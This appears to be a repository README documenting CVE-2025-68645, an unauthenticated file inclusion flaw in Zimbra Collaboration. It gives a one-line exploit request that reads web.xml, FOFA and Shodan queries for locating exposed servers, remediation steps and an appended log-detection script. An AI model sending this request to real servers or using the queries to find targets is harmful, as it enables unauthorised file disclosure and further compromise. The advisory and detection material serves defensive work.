# zimbramail-CVE-2025-68645-poc

A proof-of-concept exploiting a Local File Inclusion (LFI) vulnerability in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1, caused by improper handling of user-supplied request parameters in the RestFilter servlet.

# Vulnerability

The vulnerability exists due to improper input validation in the RestFilter servlet. An unauthenticated remote attacker can craft requests to the `/h/rest` endpoint to influence internal request dispatching, allowing inclusion of arbitrary files from the WebRoot directory.

- User-controlled parameters are not correctly sanitized.
- Internal request routing can be manipulated.
- Arbitrary files under the WebRoot directory may be included in server responses.

# Affected Versions

- Zimbra versions 10.0.x prior to 10.0.18
- Zimbra versions 10.1.x prior to 10.1.13

# PoC (by sirifu4k1)

```
http://127.0.0.1/h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml
```

# Automation

Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-68645.yaml

# Into the wild

FOFA:

```
((title="Zimbra Web Client Sign In") || (title="Zimbra 网络客户端登录"))
```

SHODAN:

```
http.title:"Zimbra Web Client Sign In"
```

# Impact

An unauthenticated remote attacker can include arbitrary files from the WebRoot directory, potentially exposing sensitive information.

- Read sensitive files (configs, environment data)
- Leak credentials or internal paths
- Gather intelligence for further exploitation
- Chain with other vulnerabilities for deeper compromise

CVSS 3.x vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`, base score 8.80, severity HIGH.

# Remediation & Mitigation

Update to the latest version of Zimbra Collaboration:

- ZCS 10.0.18
- ZCS 10.1.13 and later

Recommended actions:

1. Upgrade immediately to a patched version
2. Disable Classic UI if not required
3. Monitor logs for suspicious access to `/h/rest`
4. Restrict public access to Zimbra web endpoints where possible
5. Review WebRoot permissions and exposed files

# References

- https://nvd.nist.gov/vuln/detail/CVE-2025-68645
- https://wiki.zimbra.com/wiki/Security_Center
- https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy
- https://x.com/sirifu4k1/status/2006031417088639064

# Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.
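Recommended action 3 above asks for monitoring of `/h/rest` access. The following is an added detection example, not part of this PoC repository, that flags access-log entries matching the request shape of the public PoC (a `javax.servlet.include.*` attribute name supplied as a query parameter, or a `WEB-INF`/traversal value); the NCSA log format, the constructed sample lines and the broader `javax.servlet.` prefix match are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request part of an NCSA common-log-format line (client IP, method, target, status).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# javax.servlet.include.servlet_path is the parameter from the public PoC; flagging
# the whole "javax.servlet." prefix is an assumption that covers the sibling
# dispatch attributes of the Servlet API, which have no business in a query string.
SUSPICIOUS_PARAM_PREFIX = "javax.servlet."
SUSPICIOUS_VALUE_MARKERS = ("web-inf", "meta-inf", "../")

# Constructed sample access-log lines (203.0.113.0/24 is documentation space, not real traffic).
SAMPLE_LOG = """\
203.0.113.10 - - [01/Jan/2025:10:00:00 +0000] "GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 4123
203.0.113.11 - - [01/Jan/2025:10:00:01 +0000] "GET /h/rest?fmt=ics HTTP/1.1" 200 512
203.0.113.12 - - [01/Jan/2025:10:00:02 +0000] "GET /h/rest?JAVAX.SERVLET.INCLUDE.PATH_INFO=..%252FWEB-INF%252Fweb.xml HTTP/1.1" 200 4123
203.0.113.13 - - [01/Jan/2025:10:00:03 +0000] "GET /zimbra/ HTTP/1.1" 200 2048
"""

def inspect_line(line):
    """Return a finding dict when a line looks like CVE-2025-68645 probing, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Only the Classic UI REST endpoint is in scope; decode so encoded paths still match.
    if not unquote(parts.path).lower().endswith("/h/rest"):
        return None
    reasons = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decodes once; a second unquote catches double-encoded evasion.
        lname, lvalue = unquote(name).lower(), unquote(value).lower()
        if lname.startswith(SUSPICIOUS_PARAM_PREFIX):
            reasons.append(f"dispatch attribute in query: {name}")
        if any(marker in lvalue for marker in SUSPICIOUS_VALUE_MARKERS):
            reasons.append(f"sensitive path in value of {name}")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")), "reasons": reasons}

def scan(log_text):
    """Run inspect_line over every line and collect the findings."""
    return [f for f in map(inspect_line, log_text.splitlines()) if f]
```

A 200 status on a flagged line means the server answered the include request and is worth treating as a possible exposure rather than a blocked probe.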